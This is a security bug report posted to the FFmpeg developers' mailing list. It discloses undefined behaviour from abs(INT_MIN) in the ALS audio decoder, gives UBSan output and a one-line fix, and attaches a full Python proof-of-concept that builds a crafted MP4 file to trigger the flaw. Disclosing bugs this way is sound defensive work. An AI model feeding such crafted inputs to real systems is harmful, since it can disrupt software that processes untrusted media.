Hi, I found a UBSan-confirmed undefined behavior in libavcodec/alsdec.c.
FFmpeg version: N-123228-g0ddece40c5
Build: gcc 11 (Ubuntu 11.4.0-1ubuntu1~22.04.3), -fsanitize=address,undefined
Location: alsdec.c:1563
nbits[i] = 23 - av_log2(abs(ctx->raw_samples[c][i]));
When raw_samples[c][i] == INT_MIN (0x80000000), abs() invokes undefined
behavior -- negation of INT_MIN cannot be represented in signed int.
UBSan output:
libavcodec/alsdec.c:1563:41: runtime error: negation of -2147483648 cannot be represented in type 'int'; cast to an unsigned type to negate this value to itself
#0 in read_diff_float_data libavcodec/alsdec.c:1563
#1 in read_frame_data libavcodec/alsdec.c:1793
#2 in decode_frame libavcodec/alsdec.c:1836
#3 in decode_simple_internal libavcodec/decode.c:444
Trigger conditions:
- ALS stream with floating=1 in ALSSpecificConfig
- acf != FLOAT_1 (takes the av_cmp_sf_ieee754 branch at L1562)
- Rice-coded sample value that produces raw_samples[c][i] == INT_MIN
(e.g. shift_lsbs=16, decoded value=32768 -> 32768 << 16 = 0x80000000)
Reproduction (UBSan+ASan build required):
python3 poc_als.py # generates /tmp/poc_als
ffmpeg -i /tmp/poc_als -f null - 2>&1
Note: no memory corruption results. The FFMIN() at L1567 uses an unsigned
comparison (highest_byte is unsigned int), so the indeterminate nbits[i]
value gets clamped before any memory access or nchars accumulation.
Suggested fix:
nbits[i] = 23 - av_log2(FFABSU(ctx->raw_samples[c][i]));
FFABSU() handles INT_MIN correctly by casting to unsigned before negation
(plain FFABS() negates in the signed type, so it has the same problem as abs()).
PoC generator (poc_als.py) and full UBSan log (crash.log) attached.
Thanks,
Jenny Guanni Qu
[email protected]
crash.log
Description: Binary data
#!/usr/bin/env python3
"""
PoC for UBSan-confirmed undefined behavior in alsdec.c read_diff_float_data()
Bug: nbits[i] = 23 - av_log2(abs(raw_samples[i])). When raw_samples[i] == INT_MIN
(0x80000000), abs(INT_MIN) invokes undefined behavior -- negation of INT_MIN cannot
be represented in type 'int'. UBSan reports:
runtime error: negation of -2147483648 cannot be represented in type 'int'
Note: No heap overflow results. The FFMIN() at L1567 uses an unsigned comparison
(highest_byte is unsigned int), so the indeterminate nbits[i] value is clamped
before any memory access or nchars accumulation.
Trigger: ALS stream with floating=1, acf!=FLOAT_1, raw_samples == INT_MIN (achieved
via shift_lsbs=16), highest_byte != 0.
"""
import struct
import sys
import io
def write_be32(val):
    """Return the low 32 bits of ``val`` as four big-endian bytes."""
    truncated = val & 0xFFFFFFFF
    return truncated.to_bytes(4, 'big')
def write_be16(val):
    """Return the low 16 bits of ``val`` as two big-endian bytes."""
    truncated = val & 0xFFFF
    return truncated.to_bytes(2, 'big')
def write_be24(val):
    """Return the low 24 bits of ``val`` as three big-endian bytes."""
    truncated = val & 0xFFFFFF
    return truncated.to_bytes(3, 'big')
class BitWriter:
    """Accumulate individual bits and serialize them MSB-first into bytes.

    Bits are kept as a list of 0/1 integers in ``self.bits``; ``len(writer)``
    is the number of bits written so far.
    """

    def __init__(self):
        self.bits = []

    def write_bits(self, value, nbits):
        """Append the ``nbits`` least-significant bits of ``value``, MSB first."""
        self.bits.extend(
            (value >> shift) & 1 for shift in range(nbits - 1, -1, -1)
        )

    def write_bit(self, value):
        """Append the least-significant bit of ``value``."""
        self.bits.append(value & 1)

    def to_bytes(self):
        """Return the written bits as bytes, zero-padded to a byte boundary.

        The padding is applied to a copy: the writer itself is left untouched,
        so ``len(self)`` is unchanged and further writes continue directly
        after the last real bit instead of after hidden padding.
        """
        padded = self.bits + [0] * (-len(self.bits) % 8)
        result = bytearray()
        for start in range(0, len(padded), 8):
            byte = 0
            for bit in padded[start:start + 8]:
                byte = (byte << 1) | bit
            result.append(byte)
        return bytes(result)

    def __len__(self):
        return len(self.bits)
def rice_encode(value, k):
    """Rice-encode a signed integer as a list of 0/1 bits.

    The layout is the inverse of alsdec.c decode_rice() as summarised in the
    original notes of this script (the decoder returns ``r ? q : ~q``):

    * ``k >= 1``: a unary prefix (ones terminated by a zero) holding the high
      part of ``q``, then the flag bit ``r`` (1 for non-negative values),
      then the ``k - 1`` low bits of ``q``, MSB first. For negative values
      ``q`` is ``~value``.
    * otherwise (``k == 0``): a single unary run whose length is ``2 * value``
      for non-negative values and ``2 * (-value) - 1`` for negative ones; no
      separate flag bit is written.
    """
    if not k >= 1:
        run_length = value * 2 if value >= 0 else (-value) * 2 - 1
        return [1] * run_length + [0]

    if value >= 0:
        flag, magnitude = 1, value
    else:
        flag, magnitude = 0, ~value

    # k == 1 carries no low bits at all; k > 1 carries k - 1 of them.
    low_width = k - 1 if k > 1 else 0
    prefix_ones = magnitude >> low_width
    remainder = magnitude & ((1 << low_width) - 1)
    low_bits = [(remainder >> pos) & 1 for pos in range(low_width - 1, -1, -1)]

    return [1] * prefix_ones + [0, flag] + low_bits
def build_als_extradata(sample_rate, num_samples, num_channels, frame_length):
    """Serialize an AudioSpecificConfig followed by an ALSSpecificConfig.

    The fields are written MSB-first in the order listed below and the result
    is zero-padded to a whole number of bytes by ``BitWriter.to_bytes()``.
    Everything except the four arguments is a fixed value chosen for the PoC
    (floating=1, no prediction, no block switching, no BGMC, ...).
    """
    # (value, width in bits), in bitstream order.
    fields = (
        # --- AudioSpecificConfig ---
        (31, 5),                 # audioObjectType escape code
        (4, 6),                  # extended object type: 32 + 4 = 36 (ALS)
        (0xF, 4),                # samplingFrequencyIndex escape
        (sample_rate, 24),       # explicit 24-bit sampling frequency
        (1, 4),                  # channelConfiguration = 1 (mono)
        (0, 5),                  # 5 fill bits the parser skips for AOT 36
        # --- ALSSpecificConfig ---
        (0x414C5300, 32),        # identifier 'ALS\0'
        (sample_rate, 32),       # samp_freq
        (num_samples, 32),       # samples
        (num_channels - 1, 16),  # channels - 1
        (0, 3),                  # file_type = 0 (raw)
        (3, 3),                  # resolution = 3 (32-bit)
        (1, 1),                  # floating = 1
        (0, 1),                  # msb_first = 0
        (frame_length - 1, 16),  # frame_length - 1
        (1, 8),                  # ra_distance = 1 (every frame is RA)
        (0, 2),                  # ra_flag = 0 (no RA unit sizes)
        (0, 1),                  # adapt_order = 0
        (0, 2),                  # coef_table = 0
        (0, 1),                  # long_term_prediction = 0
        (0, 10),                 # max_order = 0
        (0, 2),                  # block_switching = 0
        (0, 1),                  # bgmc = 0
        (0, 1),                  # sb_part = 0
        (0, 1),                  # joint_stereo = 0
        (0, 1),                  # mc_coding = 0
        (0, 1),                  # chan_config = 0
        (0, 1),                  # chan_sort = 0
        (0, 1),                  # crc_enabled = 0
        (0, 1),                  # rlslms = 0
        (0, 5),                  # reserved
        (0, 1),                  # aux_data_enabled = 0
        (0xFFFFFFFF, 32),        # header_size = 0xFFFFFFFF (no header)
        (0xFFFFFFFF, 32),        # trailer_size = 0xFFFFFFFF (no trailer)
    )

    writer = BitWriter()
    for field_value, field_width in fields:
        writer.write_bits(field_value, field_width)
    return writer.to_bytes()
def build_als_frame(frame_length):
    """Build one ALS frame whose decoded samples all equal INT_MIN.

    Strategy, matching the stream configuration from build_als_extradata():

    - a single variable block with opt_order = 0 (max_order=0, adapt_order=0)
    - Rice parameter s[0] = 15 and shift_lsbs = 16
    - every residual is the Rice-coded value 32768 (0x8000), so after the
      shift the sample is 32768 << 16 = 0x80000000, i.e. INT_MIN as int32
    - the float-difference section then selects the non-ACF path with
      highest_byte = 3, which is where abs(INT_MIN) is evaluated
      (alsdec.c:1563); per the report, FFMIN at L1567 clamps nbits before any
      memory access, so no heap overflow follows

    Returns the frame as bytes.
    """
    out = BitWriter()

    # Block header as consumed by read_block / read_var_block_data.
    # With block_switching=0 no bs_info bits precede it, and with
    # bgmc=0 / sb_part=0 no sub-block count is read.
    block_header = (
        (1, 1),    # block type: 1 = variable block
        (0, 1),    # js_blocks = 0
        (15, 5),   # s[0] = 15; 5 bits wide because resolution (3) > 1
        (1, 1),    # shift_lsbs present
        (15, 4),   # stored as shift_lsbs - 1, so the decoder sees 15 + 1 = 16
    )
    for field_value, field_width in block_header:
        out.write_bits(field_value, field_width)

    # opt_order = 0: no PARCOR coefficients, no LTP data, no initial samples.
    # Residual 32768 with k = 15: q_high = 32768 >> 14 = 2, q_low = 0, so each
    # sample is unary "110", the flag bit r = 1, then 14 zero bits (18 bits).
    residual_bits = rice_encode(32768, 15)
    for _ in range(frame_length):
        for bit in residual_bits:
            out.write_bit(bit)

    # The decoder byte-aligns after the block on the non-mc_coding,
    # non-joint_stereo path, so pad with zeros up to the next byte boundary.
    out.write_bits(0, -len(out) % 8)

    # Float-difference section as consumed by read_diff_float_data.
    diff_float_header = (
        (0, 32),   # num_bytes_diff_float (skipped by the decoder)
        (0, 1),    # use_acf = 0 -> acf != FLOAT_1, reaches the nbits branch
        (3, 2),    # highest_byte = 3 (non-zero, so part B is processed)
        (0, 1),    # partA_flag = 0 (skip part A)
        (0, 1),    # shift_amp = 0 (keep last_shift_value = 0 from RA init)
        (1, 1),    # part B: compressed = 1 -> MLZ path
    )
    for field_value, field_width in diff_float_header:
        out.write_bits(field_value, field_width)

    # 256 zero bytes for the MLZ decoder to attempt reading.
    out.write_bits(0, 8 * 256)

    return out.to_bytes()
def build_mp4(extradata, frame_data, *, sample_rate=44100, frame_length=4):
    """Build a minimal MP4 container holding one ALS audio sample.

    Args:
        extradata: AudioSpecificConfig bytes placed in the esds
            DecoderSpecificInfo. Descriptor lengths are written as single
            bytes, so this must stay short (``bytes()`` raises ValueError
            once a length exceeds 255).
        frame_data: Payload of the single sample, stored in ``mdat``.
        sample_rate: Written to the mp4a sample entry and used as the
            mdhd/mvhd timescale. Must fit in 16 bits (``struct.error``
            otherwise). Defaults to the value the PoC was built with.
        frame_length: Sample duration written to stts/mdhd/mvhd and the
            tkhd payload; must match the ALS configuration. Defaults to the
            value the PoC was built with.

    Returns:
        The complete file as ``bytes``: ftyp, moov, then mdat.

    The stco chunk offset is computed from the box sizes rather than by
    searching the finished file for ``b'stco'``: stsd (which embeds
    ``extradata``) precedes stco, so a byte search could hit caller-supplied
    data and overwrite it instead of the real offset field.
    """

    def box(box_type, data):
        return struct.pack('>I', 8 + len(data)) + box_type + data

    ftyp = box(b'ftyp', b'M4A \x00\x00\x00\x00M4A mp42')

    # --- esds (ES descriptor) ---
    # NOTE(review): the two length bytes below are kept exactly as in the
    # original PoC. They do not appear to count the DecoderSpecificInfo
    # header / trailing SLConfigDescriptor; presumably the demuxer tolerates
    # this -- confirm before reusing this code elsewhere.
    dec_config_desc = bytes([
        0x04,                      # DecoderConfigDescrTag
        len(extradata) + 13,       # length
        0x40,                      # objectTypeIndication = Audio ISO/IEC 14496-3
        0x15,                      # streamType = audio (5<<2 | 1)
        0x00, 0x00, 0x00,          # bufferSizeDB
        0x00, 0x01, 0x00, 0x00,    # maxBitrate
        0x00, 0x01, 0x00, 0x00,    # avgBitrate
        0x05,                      # DecoderSpecificInfoTag
        len(extradata),
    ]) + extradata
    esds_data = bytes([
        0x00, 0x00, 0x00, 0x00,    # version + flags
        0x03,                      # ES_DescrTag
        len(dec_config_desc) + 3,  # length
        0x00, 0x01,                # ES_ID
        0x00,                      # stream priority
    ]) + dec_config_desc + bytes([
        0x06, 0x01, 0x02,          # SLConfigDescriptor
    ])
    esds = box(b'esds', esds_data)

    # --- mp4a sample entry ---
    mp4a_data = bytes([
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00,              # reserved
        0x00, 0x01,                                      # data_reference_index
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  # reserved
        0x00, 0x01,                                      # channel_count = 1
        0x00, 0x10,                                      # sample_size = 16
        0x00, 0x00,                                      # compression_id
        0x00, 0x00,                                      # packet_size
    ]) + struct.pack('>HH', sample_rate, 0) + esds       # 16.16 fixed point
    mp4a = box(b'mp4a', mp4a_data)

    # --- sample table pieces that do not depend on the chunk offset ---
    stsd = box(b'stsd', bytes([0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01]) + mp4a)
    stts = box(b'stts', struct.pack('>IIII', 0, 1, 1, frame_length))
    stsc = box(b'stsc', struct.pack('>IIIII', 0, 1, 1, 1, 1))
    stsz = box(b'stsz', struct.pack('>IIII', 0, 0, 1, len(frame_data)))

    smhd = box(b'smhd', bytes(8))
    url_box = box(b'url ', bytes([0x00, 0x00, 0x00, 0x01]))  # self-contained
    dinf = box(b'dinf', box(b'dref', struct.pack('>II', 0, 1) + url_box))

    mdhd = box(b'mdhd', struct.pack('>IIIIII', 0, 0, 0, sample_rate, frame_length, 0))
    hdlr = box(b'hdlr', bytes(4) + b'\x00\x00\x00\x00soun' + bytes(12) + b'SoundHandler\x00')

    # NOTE(review): byte layout kept identical to the original PoC. It does
    # not look like the ISO/IEC 14496-12 version-0 tkhd field order (track_ID
    # would directly follow the two timestamps) -- confirm before reuse.
    tkhd = box(b'tkhd', struct.pack('>I', 0x03) + bytes(4 * 4) +
               struct.pack('>I', 1) + bytes(4 * 2) +
               struct.pack('>I', frame_length) +
               bytes(8) +
               struct.pack('>HH', 0, 0) +
               struct.pack('>H', 0x0100) + bytes(2) +
               bytes(36) +
               struct.pack('>II', 0, 0))

    # NOTE(review): byte layout kept identical to the original PoC. The
    # sixth 32-bit zero ahead of the rate field looks like a leftover from
    # the mdhd layout -- confirm against ISO/IEC 14496-12 before reuse.
    mvhd = box(b'mvhd', struct.pack('>IIIIII', 0, 0, 0, sample_rate, frame_length, 0) +
               struct.pack('>I', 0x00010000) +
               struct.pack('>H', 0x0100) +
               bytes(10) +
               bytes(36) +
               bytes(24) +
               struct.pack('>I', 2))

    def build_moov(chunk_offset):
        """Assemble moov with the given absolute offset of the sample data."""
        stco = box(b'stco', struct.pack('>III', 0, 1, chunk_offset))
        stbl = box(b'stbl', stsd + stts + stsc + stsz + stco)
        minf = box(b'minf', smhd + dinf + stbl)
        mdia = box(b'mdia', mdhd + hdlr + minf)
        trak = box(b'trak', tkhd + mdia)
        return box(b'moov', mvhd + trak)

    # The offset field has a fixed width, so moov's size does not depend on
    # its value: measure with a placeholder, then build with the real offset
    # (ftyp + moov + the 8-byte mdat header precede the payload).
    mdat_data_offset = len(ftyp) + len(build_moov(0)) + 8
    moov = build_moov(mdat_data_offset)
    mdat = box(b'mdat', frame_data)
    return ftyp + moov + mdat
def main():
    """Generate the PoC container, write it to /tmp/poc_als and print a summary."""
    sample_rate = 44100
    frame_length = 4
    num_samples = frame_length
    num_channels = 1

    # Printed before anything is built, exactly as separate lines.
    banner = [
        "[*] Building ALS PoC",
        f" Sample rate: {sample_rate}",
        f" Frame length: {frame_length}",
        f" Channels: {num_channels}",
        " floating=1, max_order=0, adapt_order=0",
        " Rice param s[0]=15, shift_lsbs=16",
        " Raw sample value: 32768 << 16 = 0x80000000 (INT_MIN)",
        " nbits = 23 - av_log2(abs(INT_MIN)) triggers UB at alsdec.c:1563",
        " abs(INT_MIN): negation of -2147483648 cannot be represented in 'int'",
        " FFMIN at L1567 clamps nbits before any memory access (no heap overflow)",
    ]
    print("\n".join(banner))

    extradata = build_als_extradata(sample_rate, num_samples, num_channels, frame_length)
    print(f"\n[*] Extradata size: {len(extradata)} bytes")
    print(f" Hex: {extradata.hex()}")

    frame_data = build_als_frame(frame_length)
    print(f"[*] Frame data size: {len(frame_data)} bytes")
    print(f" Hex: {frame_data.hex()}")

    mp4_data = build_mp4(extradata, frame_data)
    output_path = "/tmp/poc_als"
    with open(output_path, 'wb') as poc_file:
        poc_file.write(mp4_data)

    closing = [
        f"\n[+] PoC written to {output_path} ({len(mp4_data)} bytes)",
        "\n[*] Test with (UBSan+ASan build required):",
        " python3 poc_als.py",
        f" ~/ffmpeg/ffmpeg -i {output_path} -f null - 2>&1 | tail -50",
    ]
    print("\n".join(closing))


if __name__ == '__main__':
    main()
_______________________________________________ ffmpeg-devel mailing list -- [email protected] To unsubscribe send an email to [email protected]
